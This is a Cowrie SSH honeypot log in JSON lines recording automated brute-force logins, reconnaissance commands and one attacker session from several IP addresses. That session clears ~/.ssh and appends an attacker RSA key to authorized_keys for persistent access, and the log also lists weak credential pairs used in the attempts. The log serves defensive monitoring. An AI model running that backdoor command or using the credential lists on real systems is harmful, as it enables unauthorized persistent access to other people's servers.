1@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:14.669480Z","src_ip":"212.227.235.229","session":"563055b194dd"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:15.426146Z","src_ip":"212.227.235.229","session":"563055b194dd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:16.679712Z","src_ip":"212.227.235.229","session":"563055b194dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50448,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7f600f55709","protocol":"ssh","message":"New connection: 212.227.235.229:50448 (1.2.3.4:22) [session: d7f600f55709]","sensor":"my-vps","timestamp":"2025-08-28T03:31:20.143833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:20.144519Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:20.393616Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.142114Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64589,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e10c763ba44","protocol":"ssh","message":"New connection: 45.125.211.194:64589 (1.2.3.4:22) [session: 1e10c763ba44]","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.159731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.160647Z","src_ip":"45.125.211.194","session":"1e10c763ba44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.371254Z","src_ip":"45.125.211.194","session":"1e10c763ba44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:31:21.716339Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.717055Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.969018Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:21.970213Z","src_ip":"212.227.235.229","session":"d7f600f55709"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:22.012191Z","src_ip":"45.125.211.194","session":"1e10c763ba44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50002,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db9fda658b6","protocol":"ssh","message":"New connection: 212.227.125.160:50002 (1.2.3.4:22) [session: 1db9fda658b6]","sensor":"my-vps","timestamp":"2025-08-28T03:31:23.098837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:23.099471Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:23.223357Z","src_ip":"45.125.211.194","session":"1e10c763ba44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:23.317284Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:31:23.975189Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:31:24.465788Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:31:24.466622Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:24.686001Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:24.687202Z","src_ip":"212.227.125.160","session":"1db9fda658b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46123,"dst_ip":"1.2.3.4","dst_port":22,"session":"d39f817d020f","protocol":"ssh","message":"New connection: 212.227.235.229:46123 (1.2.3.4:22) [session: d39f817d020f]","sensor":"my-vps","timestamp":"2025-08-28T03:31:26.503940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:31:26.594990Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:31:26.703999Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.login.success","username":"root","password":"Rr@123456","message":"login attempt [root/Rr@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:31:27.776788Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:31:28.088896Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.089773Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.092545Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.281534Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:31:28.457330Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.458107Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.568505Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.569587Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46124,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76ed888170d","protocol":"ssh","message":"New connection: 212.227.235.229:46124 (1.2.3.4:22) [session: e76ed888170d]","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.657604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.658269Z","src_ip":"212.227.235.229","session":"e76ed888170d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:31:28.754161Z","src_ip":"212.227.235.229","session":"e76ed888170d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60440,"dst_ip":"1.2.3.4","dst_port":22,"session":"c824c993e5b9","protocol":"ssh","message":"New connection: 212.227.125.160:60440 (1.2.3.4:22) [session: c824c993e5b9]","sensor":"my-vps","timestamp":"2025-08-28T03:31:29.015271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:29.016070Z","src_ip":"212.227.125.160","session":"c824c993e5b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:29.188242Z","src_ip":"212.227.235.229","session":"e76ed888170d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:29.248314Z","src_ip":"212.227.125.160","session":"c824c993e5b9"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:29.948163Z","src_ip":"212.227.125.160","session":"c824c993e5b9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:30.287838Z","src_ip":"212.227.235.229","session":"e76ed888170d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46125,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f7a34f0f92","protocol":"ssh","message":"New connection: 212.227.235.229:46125 (1.2.3.4:22) [session: c2f7a34f0f92]","sensor":"my-vps","timestamp":"2025-08-28T03:31:30.387762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:31:30.388844Z","src_ip":"212.227.235.229","session":"c2f7a34f0f92"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:31:30.483844Z","src_ip":"212.227.235.229","session":"c2f7a34f0f92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:31:30.912941Z","src_ip":"212.227.235.229","session":"c2f7a34f0f92"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.015860Z","src_ip":"212.227.235.229","session":"d39f817d020f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.017110Z","src_ip":"212.227.235.229","session":"c2f7a34f0f92"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.181639Z","src_ip":"212.227.125.160","session":"c824c993e5b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43092,"dst_ip":"1.2.3.4","dst_port":22,"session":"275e84ee2c14","protocol":"ssh","message":"New connection: 212.227.235.229:43092 (1.2.3.4:22) [session: 275e84ee2c14]","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.717221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.718231Z","src_ip":"212.227.235.229","session":"275e84ee2c14"}
